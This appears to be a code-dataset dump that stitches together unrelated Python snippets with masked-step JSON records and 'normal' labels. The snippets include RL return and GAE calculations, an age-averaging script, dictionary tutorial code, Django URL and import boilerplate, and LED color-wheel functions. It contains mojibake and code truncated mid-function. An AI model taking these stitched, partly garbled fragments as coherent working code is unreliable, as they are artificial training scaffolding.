len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-5": "'''\nCalculations used by algorithms\nAll calculations for training shall have a standard API that takes in `batch` from algorithm.sample() method and return np array for calculation.\n`batch` is a dict containing keys to any data type you wish, e.g. {rewards: np.array([...])}\n'''\nfrom slm_lab.lib import logger, util\nimport numpy as np\nimport torch\nimport pydash as ps\n\nlogger = logger.get_logger(__name__)\n\n# Policy Gradient calc\n# advantage functions\n\n\ndef calc_returns(batch, gamma):\n '''\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n '''\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n # handle epi-end, to not sum past current episode\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\ndef calc_gammas(batch, gamma):\n '''Calculate the gammas to the right power for multiplication with rewards'''\n news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])\n gammas = torch.empty_like(news)\n cur_gamma = 1.0\n for t, new in enumerate(news):\n cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma\n gammas[t] = cur_gamma\n return gammas\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n '''\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n '''\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n # to subtract by offsetting n-steps\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n\n # to add back the subtracted with v_pred at n\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n '''\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n '''\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# the age of some survivors
survived_age = [48.0, 15.0, 40.0, 36.0, 47.0, \
32.0, 60.0, 31.0, 17.0, 36.0, 39.0, 36.0, 32.5, \
39.0, 38.0, 36.0, 52.0, 29.0, 35.0, 35.0, 49.0, \
16.0, 27.0, 22.0, 27.0, 35.0, 3.0, 11.0, 36.0, \
1.0, 19.0, 24.0, 33.0, 43.0, 24.0, 32.0, 49.0, \
30.0, 49.0, 60.0, 23.0, 26.0, 24.0, 40.0, 25.0, \
36.0, 48.0, 21.0, 29.0, 24.0, 44.0, 41.0, 2.0, \
28.0, 40.0, 22.0, 33.0, 35.0, 24.0, 28.0, 17.0, 16.0, 48.0]
# the age of some victims
non_survived_age = [47.0, 55.0, 36.0, 38.0, 19.0, \
24.0, 36.0, 45.5, 45.0, 46.0, 57.0, 25.0, 58.0, \
46.0, 50.0, 56.0, 58.0, 62.0, 64.0, 39.0, 21.0, \
47.0, 45.0, 18.0, 70.0, 2.0, 36.0, 61.0, 47.0, \
29.0, 40.0, 19.0, 65.0, 50.0, 54.0, 36.5, 31.0]
# average age of survivors
ave_survived_age = sum(survived_age)/len(survived_age)
# take two decimal places
ave_survived_age = round(ave_survived_age,2)
# average age of victims
ave_non_survived_age = sum(non_survived_age)/len(non_survived_age)
ave_non_survived_age = round(ave_non_survived_age,2)
print("The ave_age of survivors is {}".format(ave_survived_age))
print("The ave_age of victims is {}".format(ave_non_survived_age))
# The ave_age of survivors is 31.71
# The ave_age of victims is 42.65
|
normal
|
{
"blob_id": "85c51f155439ff0cb570faafc48ac8da094515bf",
"index": 3362,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('The ave_age of survivors is {}'.format(ave_survived_age))\nprint('The ave_age of victims is {}'.format(ave_non_survived_age))\n",
"step-3": "survived_age = [48.0, 15.0, 40.0, 36.0, 47.0, 32.0, 60.0, 31.0, 17.0, 36.0,\n 39.0, 36.0, 32.5, 39.0, 38.0, 36.0, 52.0, 29.0, 35.0, 35.0, 49.0, 16.0,\n 27.0, 22.0, 27.0, 35.0, 3.0, 11.0, 36.0, 1.0, 19.0, 24.0, 33.0, 43.0, \n 24.0, 32.0, 49.0, 30.0, 49.0, 60.0, 23.0, 26.0, 24.0, 40.0, 25.0, 36.0,\n 48.0, 21.0, 29.0, 24.0, 44.0, 41.0, 2.0, 28.0, 40.0, 22.0, 33.0, 35.0, \n 24.0, 28.0, 17.0, 16.0, 48.0]\nnon_survived_age = [47.0, 55.0, 36.0, 38.0, 19.0, 24.0, 36.0, 45.5, 45.0, \n 46.0, 57.0, 25.0, 58.0, 46.0, 50.0, 56.0, 58.0, 62.0, 64.0, 39.0, 21.0,\n 47.0, 45.0, 18.0, 70.0, 2.0, 36.0, 61.0, 47.0, 29.0, 40.0, 19.0, 65.0, \n 50.0, 54.0, 36.5, 31.0]\nave_survived_age = sum(survived_age) / len(survived_age)\nave_survived_age = round(ave_survived_age, 2)\nave_non_survived_age = sum(non_survived_age) / len(non_survived_age)\nave_non_survived_age = round(ave_non_survived_age, 2)\nprint('The ave_age of survivors is {}'.format(ave_survived_age))\nprint('The ave_age of victims is {}'.format(ave_non_survived_age))\n",
"step-4": "# the age of some survivors\nsurvived_age = [48.0, 15.0, 40.0, 36.0, 47.0, \\\n32.0, 60.0, 31.0, 17.0, 36.0, 39.0, 36.0, 32.5, \\\n39.0, 38.0, 36.0, 52.0, 29.0, 35.0, 35.0, 49.0, \\\n16.0, 27.0, 22.0, 27.0, 35.0, 3.0, 11.0, 36.0, \\\n1.0, 19.0, 24.0, 33.0, 43.0, 24.0, 32.0, 49.0, \\\n30.0, 49.0, 60.0, 23.0, 26.0, 24.0, 40.0, 25.0, \\\n36.0, 48.0, 21.0, 29.0, 24.0, 44.0, 41.0, 2.0, \\\n28.0, 40.0, 22.0, 33.0, 35.0, 24.0, 28.0, 17.0, 16.0, 48.0]\n\n# the age of some victims\nnon_survived_age = [47.0, 55.0, 36.0, 38.0, 19.0, \\\n24.0, 36.0, 45.5, 45.0, 46.0, 57.0, 25.0, 58.0, \\\n46.0, 50.0, 56.0, 58.0, 62.0, 64.0, 39.0, 21.0, \\\n47.0, 45.0, 18.0, 70.0, 2.0, 36.0, 61.0, 47.0, \\\n29.0, 40.0, 19.0, 65.0, 50.0, 54.0, 36.5, 31.0]\n\n# average age of survivors\nave_survived_age = sum(survived_age)/len(survived_age)\n\n# take two decimal places\nave_survived_age = round(ave_survived_age,2)\n\n# average age of victims\nave_non_survived_age = sum(non_survived_age)/len(non_survived_age)\n\nave_non_survived_age = round(ave_non_survived_age,2)\n\nprint(\"The ave_age of survivors is {}\".format(ave_survived_age))\nprint(\"The ave_age of victims is {}\".format(ave_non_survived_age))\n\n# The ave_age of survivors is 31.71\n# The ave_age of victims is 42.65\n\n\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python3
# encoding: utf-8
"""
@version: ??
@author: ami
@license: Apache Licence
@file: dictTest.py
@time: 2019/9/25 18:26
@tools: PyCharm
"""
def func():
pass
class Main():
def __init__(self):
pass
if __name__ == '__main__':
pass
d = {'name': 'Bob', 'age': 40}
print(d)
d = {'spam': 2, 'ham': 1, 'eggs': 3}
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
print(i)
d['ham'] = ['grill', 'bake', 'fry']
print(d)
del d['eggs']
print(d)
d['brunch'] = 'Bacon'
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
d2 = {'toast': 4, 'muffin': 5}
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
table = {
'1975': 'Holy Grail',
'1979': 'Life of Brain',
'1983': 'The Meaning of Life'
}
year = '1983'
movie = table[year]
print(movie)
for year in table:
print(year + '\t' + table[year])
table2 = {
'Holy Grail': '1975',
'Life of Brain': '1979',
'The Meaning of Life': '1983'
}
print(table2['Holy Grail'])
print(list(table2.items()))
year_ = [title for (title, year) in table2.items() if year == '1975']
print(year_)
K = 'Holy Grail'
print(table2[K])
V = '1975'
key = [key for (key, value) in table2.items() if value == V]
print(key)
key = [key for key in table2.keys() if table2[key] == V]
print(key)
Matrix = {}
Matrix[(2, 3, 4)] = 88
Matrix[(7, 8, 9)] = 99
X = 2
Y = 3
Z = 4
z_ = Matrix[(X, Y, Z)]
print(z_)
print(Matrix)
if (2, 3, 6) in Matrix:
print(Matrix[(2, 3, 6)])
else:
print(0)
try:
print(Matrix[(2, 3, 6)])
except KeyError:
print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
rec = {}
rec['name'] = 'Bob'
rec['age'] = 40.5
rec['job'] = 'developer/manager'
print(rec['name'])
rec = {
'name': 'Bob',
'jobs': ['developer', 'manager'],
'web': 'www.bobs.org/?Bob',
'home': {'state': 'Overworked', 'zip': 12345}
}
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
db = []
other = {
'name': 'other',
'jobs': ['hr', 'manager'],
'web': 'www.hr.org',
'home': {'state': 'Overworked', 'zip': 55555}
}
db.append(rec)
db.append(other)
print(db[0]['jobs'])
db = {}
db['bob'] = rec
db['sue'] = other
db['bob']['jobs']
age_ = {'name': 'Bob', 'age': 40}
print(age_)
d = {}
d['name'] = 'sue'
d['age'] = 50
print(d)
di = dict(name='Bob', age=56)
print(di)
di = dict([('name', 'Bob'), ('age', 55)])
print(di)
fromkeys = dict.fromkeys(['a', 'b'], 0)
print(fromkeys)
iterator = zip(['a', 'b', 'c'], [1, 2, 3])
print(iterator)
d = dict(zip(['a', 'b', 'c'], [1, 2, 3]))
print(d)
d = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}
print(d)
d = {x: x ** 2 for x in [1, 2, 3, 4]}
print(d)
d2 = {x: x ** 2 for x in range(4)}
print(d2)
d = {c: c * 4 for c in 'SPAM'}
print(d)
d = {c.lower(): c + '!' for c in ['spam', 'eggs', 'ham']}
print(d)
d = dict.fromkeys(['a', 'b', 'c'], 0)
print(d)
d = {k: 0 for k in ['a', 'b', 'c']}
print(d)
d = dict.fromkeys('spam')
print(d)
d = dict.fromkeys('spam', 0)
print(d)
d = {k: None for k in 'spam'}
print(d)
d = dict(a=1, b=2, c=3)
print(d)
k = d.keys()
print(k)
# print(k[0])
print(list(k)[0])
v = d.values()
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
for k in d.keys(): print(k)
for key in d: print(key)
# 排序{'a': 1, 'b': 2, 'c': 3}
print(d)
Ks = d.keys()
print(Ks)
Ks = list(Ks)
Ks.sort()
print(Ks)
for k in Ks: print(k, d[k])
print("-------"*6)
D = {'b': 2, 'c': 3, 'a': 1}
Ks = D.keys()
for k in sorted(Ks): print(k, D[k])
|
normal
|
{
"blob_id": "797cedc9dc2a47713b9554e4f5975a4505ecf6d3",
"index": 9568,
"step-1": "<mask token>\n\n\nclass Main:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n pass\n<mask token>\nprint(d)\n<mask token>\nprint(d['spam'])\nprint(d)\nprint(len(d))\nprint('ham' in d)\nprint(list(d.keys()))\nprint(list(d.values()))\nprint(list(d.items()))\nfor i in d.items():\n print(i)\n<mask token>\nprint(d)\ndel d['eggs']\nprint(d)\n<mask token>\nprint(d)\nprint(list(d.values()))\nprint(list(d.keys()))\nprint(list(d.items()))\nprint(d.get('ham'))\nprint(d.get('toast'))\nprint(d.get('toast', 88))\nprint(d)\n<mask token>\nd.update(d2)\nprint(d)\nprint(d.pop('muffin'))\nprint(d.pop('toast'))\nprint(d)\n<mask token>\nprint(movie)\nfor year in table:\n print(year + '\\t' + table[year])\n<mask token>\nprint(table2['Holy Grail'])\nprint(list(table2.items()))\n<mask token>\nprint(year_)\n<mask token>\nprint(table2[K])\n<mask token>\nprint(key)\n<mask token>\nprint(key)\n<mask token>\nprint(z_)\nprint(Matrix)\nif (2, 3, 6) in Matrix:\n print(Matrix[2, 3, 6])\nelse:\n print(0)\ntry:\n print(Matrix[2, 3, 6])\nexcept KeyError:\n print(0)\nprint(Matrix.get((2, 3, 4), 0))\nprint(Matrix.get((2, 3, 6), 0))\n<mask token>\nprint(rec['name'])\n<mask token>\nprint(rec['name'])\nprint(rec['jobs'])\nprint(rec['jobs'][1])\nprint(rec['home']['zip'])\n<mask token>\ndb.append(rec)\ndb.append(other)\nprint(db[0]['jobs'])\n<mask token>\ndb['bob']['jobs']\n<mask token>\nprint(age_)\n<mask token>\nprint(d)\n<mask token>\nprint(di)\n<mask token>\nprint(di)\n<mask token>\nprint(fromkeys)\n<mask token>\nprint(iterator)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d2)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(k)\nprint(list(k)[0])\n<mask token>\nprint(v)\nprint(list(v))\nprint(d.items())\nprint(list(d.items()))\nfor k in d.keys():\n print(k)\nfor key in d:\n print(key)\nprint(d)\n<mask token>\nprint(Ks)\n<mask token>\nKs.sort()\nprint(Ks)\nfor k in Ks:\n print(k, d[k])\nprint('-------' * 6)\n<mask token>\nfor k in sorted(Ks):\n print(k, D[k])\n",
"step-4": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n pass\nd = {'name': 'Bob', 'age': 40}\nprint(d)\nd = {'spam': 2, 'ham': 1, 'eggs': 3}\nprint(d['spam'])\nprint(d)\nprint(len(d))\nprint('ham' in d)\nprint(list(d.keys()))\nprint(list(d.values()))\nprint(list(d.items()))\nfor i in d.items():\n print(i)\nd['ham'] = ['grill', 'bake', 'fry']\nprint(d)\ndel d['eggs']\nprint(d)\nd['brunch'] = 'Bacon'\nprint(d)\nprint(list(d.values()))\nprint(list(d.keys()))\nprint(list(d.items()))\nprint(d.get('ham'))\nprint(d.get('toast'))\nprint(d.get('toast', 88))\nprint(d)\nd2 = {'toast': 4, 'muffin': 5}\nd.update(d2)\nprint(d)\nprint(d.pop('muffin'))\nprint(d.pop('toast'))\nprint(d)\ntable = {'1975': 'Holy Grail', '1979': 'Life of Brain', '1983':\n 'The Meaning of Life'}\nyear = '1983'\nmovie = table[year]\nprint(movie)\nfor year in table:\n print(year + '\\t' + table[year])\ntable2 = {'Holy Grail': '1975', 'Life of Brain': '1979',\n 'The Meaning of Life': '1983'}\nprint(table2['Holy Grail'])\nprint(list(table2.items()))\nyear_ = [title for title, year in table2.items() if year == '1975']\nprint(year_)\nK = 'Holy Grail'\nprint(table2[K])\nV = '1975'\nkey = [key for key, value in table2.items() if value == V]\nprint(key)\nkey = [key for key in table2.keys() if table2[key] == V]\nprint(key)\nMatrix = {}\nMatrix[2, 3, 4] = 88\nMatrix[7, 8, 9] = 99\nX = 2\nY = 3\nZ = 4\nz_ = Matrix[X, Y, Z]\nprint(z_)\nprint(Matrix)\nif (2, 3, 6) in Matrix:\n print(Matrix[2, 3, 6])\nelse:\n print(0)\ntry:\n print(Matrix[2, 3, 6])\nexcept KeyError:\n print(0)\nprint(Matrix.get((2, 3, 4), 0))\nprint(Matrix.get((2, 3, 6), 0))\nrec = {}\nrec['name'] = 'Bob'\nrec['age'] = 40.5\nrec['job'] = 'developer/manager'\nprint(rec['name'])\nrec = {'name': 'Bob', 'jobs': ['developer', 'manager'], 'web':\n 'www.bobs.org/?Bob', 'home': {'state': 'Overworked', 'zip': 12345}}\nprint(rec['name'])\nprint(rec['jobs'])\nprint(rec['jobs'][1])\nprint(rec['home']['zip'])\ndb = []\nother = {'name': 'other', 'jobs': ['hr', 'manager'], 'web': 'www.hr.org',\n 'home': {'state': 'Overworked', 'zip': 55555}}\ndb.append(rec)\ndb.append(other)\nprint(db[0]['jobs'])\ndb = {}\ndb['bob'] = rec\ndb['sue'] = other\ndb['bob']['jobs']\nage_ = {'name': 'Bob', 'age': 40}\nprint(age_)\nd = {}\nd['name'] = 'sue'\nd['age'] = 50\nprint(d)\ndi = dict(name='Bob', age=56)\nprint(di)\ndi = dict([('name', 'Bob'), ('age', 55)])\nprint(di)\nfromkeys = dict.fromkeys(['a', 'b'], 0)\nprint(fromkeys)\niterator = zip(['a', 'b', 'c'], [1, 2, 3])\nprint(iterator)\nd = dict(zip(['a', 'b', 'c'], [1, 2, 3]))\nprint(d)\nd = {k: v for k, v in zip(['a', 'b', 'c'], [1, 2, 3])}\nprint(d)\nd = {x: (x ** 2) for x in [1, 2, 3, 4]}\nprint(d)\nd2 = {x: (x ** 2) for x in range(4)}\nprint(d2)\nd = {c: (c * 4) for c in 'SPAM'}\nprint(d)\nd = {c.lower(): (c + '!') for c in ['spam', 'eggs', 'ham']}\nprint(d)\nd = dict.fromkeys(['a', 'b', 'c'], 0)\nprint(d)\nd = {k: (0) for k in ['a', 'b', 'c']}\nprint(d)\nd = dict.fromkeys('spam')\nprint(d)\nd = dict.fromkeys('spam', 0)\nprint(d)\nd = {k: None for k in 'spam'}\nprint(d)\nd = dict(a=1, b=2, c=3)\nprint(d)\nk = d.keys()\nprint(k)\nprint(list(k)[0])\nv = d.values()\nprint(v)\nprint(list(v))\nprint(d.items())\nprint(list(d.items()))\nfor k in d.keys():\n print(k)\nfor key in d:\n print(key)\nprint(d)\nKs = d.keys()\nprint(Ks)\nKs = list(Ks)\nKs.sort()\nprint(Ks)\nfor k in Ks:\n print(k, d[k])\nprint('-------' * 6)\nD = {'b': 2, 'c': 3, 'a': 1}\nKs = D.keys()\nfor k in sorted(Ks):\n print(k, D[k])\n",
"step-5": "#!/usr/bin/env python3\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\n@version: ??\r\n@author: ami\r\n@license: Apache Licence \r\n@file: dictTest.py\r\n@time: 2019/9/25 18:26\r\n@tools: PyCharm\r\n\"\"\"\r\n\r\n\r\ndef func():\r\n pass\r\n\r\n\r\nclass Main():\r\n def __init__(self):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n\r\nd = {'name': 'Bob', 'age': 40}\r\nprint(d)\r\n\r\nd = {'spam': 2, 'ham': 1, 'eggs': 3}\r\nprint(d['spam'])\r\nprint(d)\r\n\r\nprint(len(d))\r\nprint('ham' in d)\r\nprint(list(d.keys()))\r\nprint(list(d.values()))\r\nprint(list(d.items()))\r\n\r\nfor i in d.items():\r\n print(i)\r\n\r\nd['ham'] = ['grill', 'bake', 'fry']\r\nprint(d)\r\n\r\ndel d['eggs']\r\nprint(d)\r\nd['brunch'] = 'Bacon'\r\nprint(d)\r\n\r\nprint(list(d.values()))\r\nprint(list(d.keys()))\r\nprint(list(d.items()))\r\n\r\nprint(d.get('ham'))\r\nprint(d.get('toast'))\r\nprint(d.get('toast', 88))\r\nprint(d)\r\nd2 = {'toast': 4, 'muffin': 5}\r\nd.update(d2)\r\nprint(d)\r\nprint(d.pop('muffin'))\r\nprint(d.pop('toast'))\r\nprint(d)\r\n\r\ntable = {\r\n '1975': 'Holy Grail',\r\n '1979': 'Life of Brain',\r\n '1983': 'The Meaning of Life'\r\n}\r\nyear = '1983'\r\nmovie = table[year]\r\nprint(movie)\r\n\r\nfor year in table:\r\n print(year + '\\t' + table[year])\r\n\r\ntable2 = {\r\n 'Holy Grail': '1975',\r\n 'Life of Brain': '1979',\r\n 'The Meaning of Life': '1983'\r\n}\r\nprint(table2['Holy Grail'])\r\nprint(list(table2.items()))\r\n\r\nyear_ = [title for (title, year) in table2.items() if year == '1975']\r\nprint(year_)\r\n\r\nK = 'Holy Grail'\r\nprint(table2[K])\r\nV = '1975'\r\nkey = [key for (key, value) in table2.items() if value == V]\r\nprint(key)\r\nkey = [key for key in table2.keys() if table2[key] == V]\r\nprint(key)\r\n\r\nMatrix = {}\r\nMatrix[(2, 3, 4)] = 88\r\nMatrix[(7, 8, 9)] = 99\r\nX = 2\r\nY = 3\r\nZ = 4\r\nz_ = Matrix[(X, Y, Z)]\r\nprint(z_)\r\nprint(Matrix)\r\n\r\nif (2, 3, 6) in Matrix:\r\n print(Matrix[(2, 3, 6)])\r\nelse:\r\n print(0)\r\n\r\ntry:\r\n print(Matrix[(2, 3, 6)])\r\nexcept KeyError:\r\n print(0)\r\n\r\nprint(Matrix.get((2, 3, 4), 0))\r\nprint(Matrix.get((2, 3, 6), 0))\r\n\r\nrec = {}\r\nrec['name'] = 'Bob'\r\nrec['age'] = 40.5\r\nrec['job'] = 'developer/manager'\r\nprint(rec['name'])\r\n\r\nrec = {\r\n 'name': 'Bob',\r\n 'jobs': ['developer', 'manager'],\r\n 'web': 'www.bobs.org/?Bob',\r\n 'home': {'state': 'Overworked', 'zip': 12345}\r\n}\r\nprint(rec['name'])\r\nprint(rec['jobs'])\r\nprint(rec['jobs'][1])\r\nprint(rec['home']['zip'])\r\ndb = []\r\nother = {\r\n 'name': 'other',\r\n 'jobs': ['hr', 'manager'],\r\n 'web': 'www.hr.org',\r\n 'home': {'state': 'Overworked', 'zip': 55555}\r\n}\r\ndb.append(rec)\r\ndb.append(other)\r\nprint(db[0]['jobs'])\r\n\r\ndb = {}\r\ndb['bob'] = rec\r\ndb['sue'] = other\r\ndb['bob']['jobs']\r\n\r\nage_ = {'name': 'Bob', 'age': 40}\r\nprint(age_)\r\n\r\nd = {}\r\nd['name'] = 'sue'\r\nd['age'] = 50\r\nprint(d)\r\n\r\ndi = dict(name='Bob', age=56)\r\nprint(di)\r\n\r\ndi = dict([('name', 'Bob'), ('age', 55)])\r\nprint(di)\r\n\r\nfromkeys = dict.fromkeys(['a', 'b'], 0)\r\nprint(fromkeys)\r\n\r\niterator = zip(['a', 'b', 'c'], [1, 2, 3])\r\nprint(iterator)\r\nd = dict(zip(['a', 'b', 'c'], [1, 2, 3]))\r\nprint(d)\r\n\r\nd = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}\r\nprint(d)\r\n\r\nd = {x: x ** 2 for x in [1, 2, 3, 4]}\r\nprint(d)\r\nd2 = {x: x ** 2 for x in range(4)}\r\nprint(d2)\r\n\r\nd = {c: c * 4 for c in 'SPAM'}\r\nprint(d)\r\n\r\nd = {c.lower(): c + '!' for c in ['spam', 'eggs', 'ham']}\r\nprint(d)\r\n\r\nd = dict.fromkeys(['a', 'b', 'c'], 0)\r\nprint(d)\r\n\r\nd = {k: 0 for k in ['a', 'b', 'c']}\r\nprint(d)\r\n\r\nd = dict.fromkeys('spam')\r\nprint(d)\r\nd = dict.fromkeys('spam', 0)\r\nprint(d)\r\n\r\nd = {k: None for k in 'spam'}\r\nprint(d)\r\n\r\nd = dict(a=1, b=2, c=3)\r\nprint(d)\r\nk = d.keys()\r\nprint(k)\r\n# print(k[0])\r\nprint(list(k)[0])\r\nv = d.values()\r\nprint(v)\r\nprint(list(v))\r\nprint(d.items())\r\nprint(list(d.items()))\r\n\r\nfor k in d.keys(): print(k)\r\n\r\nfor key in d: print(key)\r\n\r\n# 排序{'a': 1, 'b': 2, 'c': 3}\r\nprint(d)\r\nKs = d.keys()\r\nprint(Ks)\r\nKs = list(Ks)\r\nKs.sort()\r\nprint(Ks)\r\nfor k in Ks: print(k, d[k])\r\n\r\nprint(\"-------\"*6)\r\nD = {'b': 2, 'c': 3, 'a': 1}\r\nKs = D.keys()\r\nfor k in sorted(Ks): print(k, D[k])\r\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from django.conf.urls import url
#from .views import CommandReceiveView
from .views import index, send_message
urlpatterns = [
#url(r'^bot/(?P<bot_token>.+)/$', CommandReceiveView.as_view(), name='command'),
url(r'^send_message$', send_message, name='send_message'),
url(r'^$', index, name='index'),
]
|
normal
|
{
"blob_id": "6cc56f73e58366a3906da537cc27fdd5a066ee34",
"index": 2647,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^send_message$', send_message, name='send_message'),\n url('^$', index, name='index')]\n",
"step-3": "from django.conf.urls import url\nfrom .views import index, send_message\nurlpatterns = [url('^send_message$', send_message, name='send_message'),\n url('^$', index, name='index')]\n",
"step-4": "from django.conf.urls import url\n\n#from .views import CommandReceiveView\nfrom .views import index, send_message\n\nurlpatterns = [\n #url(r'^bot/(?P<bot_token>.+)/$', CommandReceiveView.as_view(), name='command'),\n url(r'^send_message$', send_message, name='send_message'),\n url(r'^$', index, name='index'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from django.db import models
from django.db.models import F, Q, Sum, Avg
from django.db import transaction
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.sites.models import Site
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.template.loader import render_to_string
from datetime import datetime, timedelta, date
<|reserved_special_token_1|>
# coding=UTF-8
#!/usr/bin/env python
# for models.py
from django.db import models
from django.db.models import F, Q, Sum, Avg
from django.db import transaction
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.sites.models import Site
# from apps.router.models import User
# from django.contrib.auth.models import Message
# from django.contrib import messages TODO: wangqi 20150521 Message�ƺ�û�õ��ˣ����Ҫ�������������滻
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.template.loader import render_to_string
from datetime import datetime, timedelta, date
# from apps.common.utils.utils_collection import *
# from apps.common.utils.utils_datetime import *
# from apps.common.utils.utils_mysql import *
# from apps.common.utils.utils_number import *
# from apps.common.utils.utils_render import *
# from apps.common.biz_utils.utils_sorter import *
# from apps.common.utils.utils_string import *
# from apps.common.biz_utils.utils_misc import *
# from apilib import *
# from apilib import tsapi
|
flexible
|
{
"blob_id": "d551cab1856fbdb91918f9171d5c02b8dab84aba",
"index": 8223,
"step-1": "<mask token>\n",
"step-2": "from django.db import models\nfrom django.db.models import F, Q, Sum, Avg\nfrom django.db import transaction\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.sites.models import Site\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.template.loader import render_to_string\nfrom datetime import datetime, timedelta, date\n",
"step-3": "# coding=UTF-8\n#!/usr/bin/env python\n\n# for models.py\nfrom django.db import models\nfrom django.db.models import F, Q, Sum, Avg\nfrom django.db import transaction\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.sites.models import Site\n# from apps.router.models import User\n# from django.contrib.auth.models import Message\n# from django.contrib import messages TODO: wangqi 20150521 Message�ƺ�û�õ��ˣ����Ҫ�������������滻\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.template.loader import render_to_string\nfrom datetime import datetime, timedelta, date\n\n# from apps.common.utils.utils_collection import *\n# from apps.common.utils.utils_datetime import *\n# from apps.common.utils.utils_mysql import *\n# from apps.common.utils.utils_number import *\n# from apps.common.utils.utils_render import *\n# from apps.common.biz_utils.utils_sorter import *\n# from apps.common.utils.utils_string import *\n# from apps.common.biz_utils.utils_misc import *\n# from apilib import *\n# from apilib import tsapi\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def wheeln(pos, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 0 or pos > 255:
return 0, 0, 0
if pos < 85:
return int(255 - pos * 3), int(pos * 3), 0
elif pos < 170:
pos -= 85
return 0, int(255 - pos * 3), int(pos * 3)
else:
pos -= 170
return int(pos * 3), 0, int(255 - pos * 3)
def randcolor():
randgr = randrd = randbl = 0
if random.randint(0, 14) == 1:
if random.randint(0, 1) == 1:
randgr = random.randint(1, 255)
if random.randint(0, 1) == 1:
randrd = random.randint(1, 255)
if random.randint(0, 1) == 1:
randbl = random.randint(1, 255)
return randgr, randrd, randbl
def flame(pos, clr, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 32:
